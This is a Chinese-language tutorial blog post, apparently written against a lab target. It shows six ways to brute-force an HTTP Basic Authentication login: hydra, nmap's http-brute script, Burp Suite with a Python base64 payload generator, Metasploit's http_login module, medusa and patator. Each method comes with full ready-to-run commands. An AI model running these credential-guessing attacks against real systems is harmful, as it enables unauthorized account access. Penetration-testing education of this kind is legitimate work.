登陆验证爆破

admin 2025年1月8日13:54:50评论7 views字数 2412阅读8分2秒阅读模式

登陆验证爆破

登陆验证爆破

访问80需要登陆,弱口令admin/admin登陆成功,先随便输入弱口令看看能不能蒙对,接下来在爆破

登陆验证爆破

方法1:

hydra -l admin -P ../top1000.txt -u -e ns http-get://10.10.11.106/

-u强制每次尝试只使用单个用户名,而不是交替尝试多个用户名。            -e ns额外尝试:            n:尝试空密码。            s:在密码后添加目标用户名。            这会增加测试的灵活性,尤其在目标有未设置密码或弱配置时            

登陆验证爆破

方法2:

nmap -p 80 --script http-brute --script-args userdb=name.txt,passdb=../top1000.txt 10.10.11.106

#指定单个用户名,user=admin

使用 Nmap 的 http-brute 脚本进行暴力破解,主要针对 HTTP 基本认证的暴力测试

登陆验证爆破

方法3;

登陆页面抓包

登陆验证爆破

Authorization:base加密后的账号密码,账号:密码

MTExOjIyMg==

111:222

登陆验证爆破

登陆验证爆破

用脚本编写<密码>

import base64            # 文件路径            user_file = "name.txt"# 用户名字典文件            pass_file = "../top1000.txt"# 密码字典文件            output_file = "payloads.txt"# 输出文件路径            # 读取文件内容            try:            with open(user_file, "r") as uf:            usernames = [line.strip() for line in uf.readlines()]# 去掉每行的换行符            with open(pass_file, "r") as pf:            passwords = [line.strip() for line in pf.readlines()]            except FileNotFoundError as e:            print(f"文件未找到: {e}")            exit()            # 生成 Base64 编码并写入输出文件            with open(output_file, "w") as f:            for user in usernames:            for pwd in passwords:            auth_str = f"{user}:{pwd}"# 用户名和密码组合            base64_str = base64.b64encode(auth_str.encode()).decode()# Base64 编码            f.write(base64_str + "n")# 写入文件            print(f"Base64 编码已生成并写入 '{output_file}' 文件!")            

攻击方式是cluster

生成的payload直接导入就行

登陆验证爆破

添加payload

登陆验证爆破

导入payload.txt,取消编码,开始攻击

登陆验证爆破

找到相应码或者长度明显和其他差距很大的,就是爆破成功了

登陆验证爆破

方法4:

msfconsolemsf启动            use auxiliary/scanner/http/http_login设置模块            set rhosts 10.10.11.106设置目标ip            set PASS_FILE /root/top1000.txt设置密码字典            set USER_FILE /root/Desktop/name.txt设置用户名字典            run            

登陆验证爆破

登陆验证爆破

方法5:

medusa -h 10.10.11.106 -U name.txt -P ../top1000.txt -M http -m DIR:/ -T 10

-h <目标IP>:指定目标主机的 IP 地址。            -U user.txt:指定用户名字典文件。            -P passwd.txt:指定密码字典文件。            -M http:指定目标协议为 HTTP。            -m DIR:/protected_path:指定 HTTP Basic Authentication 所在的路径(例如 /protected_path)。            -T 10:设置测试线程数为 10,以提高测试速度(根据目标环境调整)。            

登陆验证爆破

方法6:

patator http_fuzz url=http://10.10.11.106/ user_pass=FILE0:FILE1 0=name.txt 1=../top1000.txt -x ignore:code=401

py版本高了会有转义符警告,但是没影响运行

http_fuzz:            Patator的子模块,用于模拟和测试 HTTP 协议的模糊测试。            url=http://10.10.11.106/:            指定目标 URL,这里是 http://10.10.11.106/。            user_pass=FILE0:FILE1:            设置 HTTP Basic 认证的用户名和密码的组合。            文件 FILE0 包含用户名列表(name.txt),FILE1 包含密码列表(top1000.txt)。            Patator 会从 name.txt 和 top1000.txt 中读取每一行内容进行组合尝试。            0=name.txt 和 1=../top1000.txt:            定义文件变量。            0 和 1 对应于 FILE0 和 FILE1,分别是用户名文件和密码文件。            -x ignore:code=401:            忽略所有返回 HTTP 状态码为 401(未授权)的响应。            Patator 只会打印出尝试中未返回 401 的结果(即成功的用户名和密码组合)。            

登陆验证爆破

总结:字典好,对方密码不难,再加上一点运气就有机会爆破成功

原文始发于微信公众号(王之暴龙战神):登陆验证爆破

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月8日13:54:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   登陆验证爆破https://cn-sec.com/archives/3605571.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息